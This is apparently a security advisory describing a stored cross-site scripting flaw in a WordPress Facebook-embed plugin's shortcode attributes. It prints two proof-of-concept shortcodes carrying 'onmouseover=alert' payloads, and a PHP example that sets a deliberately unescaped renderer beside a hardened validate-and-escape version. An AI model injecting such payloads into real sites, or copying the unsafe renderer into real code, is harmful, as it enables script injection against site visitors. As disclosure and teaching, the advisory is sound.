Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

v < 3.1.1 - [fb_plugin video href="https://www.facebook.com/facebook/videos/10153231379946729/" autoplay='" onmouseover="alert(/XSS/)"' ]

v < 3.1.2 - [fb_plugin video adaptive="true" href="https://www.facebook.com/facebook/videos/10153231379946729/" width='"onmouseover=alert(/XSS/)//']
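
The missing validate-and-escape step, shown as an added example that is not the plugin's own code: a hypothetical renderer that concatenates shortcode attributes into markup, beside a version that validates each attribute by type and escapes it on output. The function names, the `data-*` markup and the fallback width are assumptions; it runs in plain PHP 7.4+ without WordPress.

```php
<?php
// Added example: hypothetical shortcode renderer, not the plugin's real code.

// Vulnerable pattern: attribute values go into the markup unescaped, so a
// double quote in a value ends the HTML attribute and starts a new one.
function render_video_unsafe(array $atts): string {
    return '<div class="fb-video" data-href="' . $atts['href'] . '"'
        . ' data-autoplay="' . $atts['autoplay'] . '"'
        . ' data-width="' . $atts['width'] . '"></div>';
}

// Hardened pattern: validate each attribute by type, then escape on output.
// In WordPress the escaping step would use esc_url() and esc_attr().
function render_video_safe(array $atts): string {
    $esc = fn(string $v): string =>
        htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // href: accept only a well-formed http(s) URL.
    $href = filter_var($atts['href'], FILTER_VALIDATE_URL) ?: '';
    $scheme = strtolower((string) parse_url($href, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        $href = '';
    }
    // autoplay: boolean flag only; anything else becomes "false".
    $autoplay = filter_var($atts['autoplay'], FILTER_VALIDATE_BOOLEAN) ? 'true' : 'false';
    // width: digits only; 500 is a constructed fallback value.
    $width = ctype_digit((string) $atts['width']) ? (string) (int) $atts['width'] : '500';

    return '<div class="fb-video" data-href="' . $esc($href) . '"'
        . ' data-autoplay="' . $esc($autoplay) . '"'
        . ' data-width="' . $esc($width) . '"></div>';
}

// Constructed inputs using the attribute values from the two shortcodes above.
$href = 'https://www.facebook.com/facebook/videos/10153231379946729/';
$cases = [
    ['href' => $href, 'autoplay' => '" onmouseover="alert(/XSS/)"', 'width' => '500'],
    ['href' => $href, 'autoplay' => 'true', 'width' => '"onmouseover=alert(/XSS/)//'],
];
foreach ($cases as $atts) {
    echo render_video_unsafe($atts), PHP_EOL;
    echo render_video_safe($atts), PHP_EOL, PHP_EOL;
}
```

Comparing each pair of output lines shows the unsafe renderer emitting a separate `onmouseover` attribute, while the hardened one reduces the same input to a fixed `false` or numeric value.
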
CPE

| Name | Operator | Version |
|---|---|---|
| | eq | 3.1.2 |